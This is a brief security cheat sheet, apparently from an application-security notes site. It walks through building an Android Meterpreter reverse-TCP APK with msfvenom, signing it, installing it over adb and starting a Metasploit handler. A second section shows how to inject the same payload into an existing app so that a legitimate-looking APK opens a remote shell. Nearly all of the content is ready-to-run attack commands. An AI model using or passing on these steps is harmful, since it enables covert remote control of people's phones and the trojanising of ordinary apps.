AppSecNotes
APK with Metasploit Shell
Generic default APK auto-generated by msfvenom
  1. Create the generic apk: 
    msfvenom -p android/meterpreter/reverse_tcp LHOST=YOUR_IP_ADDRESS LPORT=446 R> android_shell.apk
  2. Sign and align it: 
    java -jar uber-apk-signer-1.3.0.jar --apks android_shell.apk
  3. Install it: 
    adb -H IP_FROM_HOST_RUNNING_ADB_SERVER -P 5037 install android_shell-aligned-debugSigned.apk
  4. Start reverse TCP handler on Kali:
    1. $ msfconsole
    2. $ use exploit/multi/handler
    3. $ set payload android/meterpreter/reverse_tcp
    4. $ set lhost YOUR_IP_ADDRESS
    5. $ set lport 446
    6. $ run
  5. Run the application in the Android phone and the reverse shell session should open.
Inject shell into Existing APK
  1. Inject the payload in the desired app: 
    msfvenom -x app_name.apk -p android/meterpreter/reverse_tcp LHOST=YOUR_IP_ADDRESS LPORT=446 -o new_app_name.apk
  2. install it: 
    adb -H YOUR_IP_ADDRESS -P 5037 install new_app_name.apk
  3. Start reverse TCP handler on Kali:
    1. $ msfconsole
    2. $ use exploit/multi/handler
    3. $ set payload android/meterpreter/reverse_tcp
    4. $ set lhost YOUR_IP_ADDRESS
    5. $ set lport 446
    6. $ run
  4. Run the application in the Android phone and the reverse shell session should open.